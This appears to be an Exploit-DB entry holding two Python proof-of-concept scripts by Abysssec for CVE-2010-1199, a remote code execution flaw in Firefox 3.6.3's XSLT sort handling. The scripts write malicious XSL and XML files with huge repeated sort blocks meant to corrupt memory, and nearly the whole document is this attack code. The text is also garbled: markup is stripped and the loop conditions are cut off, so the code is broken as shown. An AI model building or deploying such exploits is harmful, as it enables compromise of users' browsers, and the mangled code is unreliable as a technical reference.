''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """ Beatles """ BlockCount = 43000 count = 1 while(count\n" count = count + 1 myStyle = myStyle +"""
""" cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """ """ block = """ """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "\n" count = 1 while(count """ myStyle = myStyle + " "+"A"*rowCount+"\n" myStyle = myStyle + """ Lennon """ myStyle = myStyle + " "+"B"*rowCount+"\n" myStyle = myStyle + """ McCartney """ myStyle = myStyle + " "+"C"*rowCount+"\n" myStyle = myStyle + """ Harrison """ myStyle = myStyle + " "+"D"*rowCount+"\n" myStyle = myStyle + """ Starr """ myStyle = myStyle + " "+"E"*rowCount+"\n" myStyle = myStyle +""" Dunn """ count = count - 1 myStyle = myStyle +""" """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close()